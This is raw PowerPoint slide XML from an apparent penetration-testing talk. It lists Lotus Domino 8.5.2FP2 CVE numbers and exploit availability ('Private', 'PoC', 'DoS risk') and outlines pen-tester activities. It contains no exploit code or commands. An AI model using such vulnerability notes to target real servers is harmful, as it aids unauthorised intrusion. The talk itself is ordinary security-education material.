            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Выноска 1 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="2060848"/>
            <a:ext cx="1296144" cy="735147"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52589"/>
              <a:gd name="adj2" fmla="val -4746"/>
              <a:gd name="adj3" fmla="val 390017"/>
              <a:gd name="adj4" fmla="val -70956"/>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Useless, (client-side)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Выноска 1 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="2909877"/>
            <a:ext cx="1296144" cy="735147"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52589"/>
              <a:gd name="adj2" fmla="val -4746"/>
              <a:gd name="adj3" fmla="val 301970"/>
              <a:gd name="adj4" fmla="val -53517"/>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Useless,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fixed in 8.5.2…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40103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496" y="188640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lotus Domino 8.5.2FP2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1412776"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-091</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0915</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0916</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0919</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0920</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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11</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Скругленный прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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 more search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="2060848"/>
            <a:ext cx="2021707"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Pen-tester’s actions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Выноска 1 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="1064144"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 60806"/>
              <a:gd name="adj4" fmla="val -88145"/>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Private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Выноска 1 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="1931722"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 10572"/>
              <a:gd name="adj4" fmla="val -86642"/>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Private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Выноска 1 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="2795818"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -42306"/>
              <a:gd name="adj4" fmla="val -88895"/>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None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Выноска 1 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="3731922"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -108403"/>
              <a:gd name="adj4" fmla="val -88144"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Выноска 1 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="4596018"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -158637"/>
              <a:gd name="adj4" fmla="val -89646"/>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None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Выноска 1 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="5445224"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -210193"/>
              <a:gd name="adj4" fmla="val -91899"/>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Private</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Группа 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="251520" y="1411116"/>
            <a:ext cx="2808312" cy="4309523"/>
            <a:chOff x="251520" y="1411116"/>
            <a:chExt cx="2808312" cy="4309523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Выноска 1 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="899592" y="1411116"/>
              <a:ext cx="2160240" cy="2017884"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val 197260"/>
                <a:gd name="adj4" fmla="val -19183"/>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endParaRPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="5351307"/>
              <a:ext cx="2460866" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Buffer Errors (CWE-119)</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Группа 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611560" y="3511965"/>
            <a:ext cx="2448272" cy="1222471"/>
            <a:chOff x="611560" y="1411116"/>
            <a:chExt cx="2448272" cy="5283298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Выноска 1 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="899592" y="1411116"/>
              <a:ext cx="2160240" cy="2017883"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val 197260"/>
                <a:gd name="adj4" fmla="val -6837"/>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endParaRPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="611560" y="5098228"/>
              <a:ext cx="2305439" cy="1596186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Auth. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>ssue (CWE-287)</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Группа 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5940152" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
            <a:chOff x="5940152" y="2420888"/>
            <a:chExt cx="2736304" cy="1296144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Скругленный прямоугольник 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940152" y="2420888"/>
              <a:ext cx="2736304" cy="1296144"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="3492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p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\Alexej\Downloads\images (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342" y="2456199"/>
              <a:ext cx="1136105" cy="1225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Группа 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5940152" y="3789040"/>
            <a:ext cx="2736304" cy="2520280"/>
            <a:chOff x="5940152" y="3789040"/>
            <a:chExt cx="2736304" cy="2520280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Скругленный прямоугольник 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940152" y="4365104"/>
              <a:ext cx="2736304" cy="1944216"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="3492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Lotus… blah-blah-blah, has many </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>vuln</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. issues. Not public or stable, exploit are available … blah-blah-blah, please update to 8.5.2FP3 or 8.5.3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Стрелка вниз 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7020272" y="3789040"/>
              <a:ext cx="576064" cy="513408"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="34925">
              <a:solidFill>
                <a:srgbClr val="F47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94193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54968" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No fun…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590872" y="1768184"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No fun…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lotus server still not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (just in theory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>f we could  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> it, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>maybe we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>would get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MORE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--------------------- BUT ---------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have no time for research and exploit dev. for those bugs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CWE-119)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is risky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is pen-test and we have other targets…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--------------------- SO ------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pen-tester is not a researcher? Forget about it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="439019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824" y="417984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What do pen-testers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Banner grabbing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Play with passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Escalate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dig in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find ways to make attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.t.c</a:t>
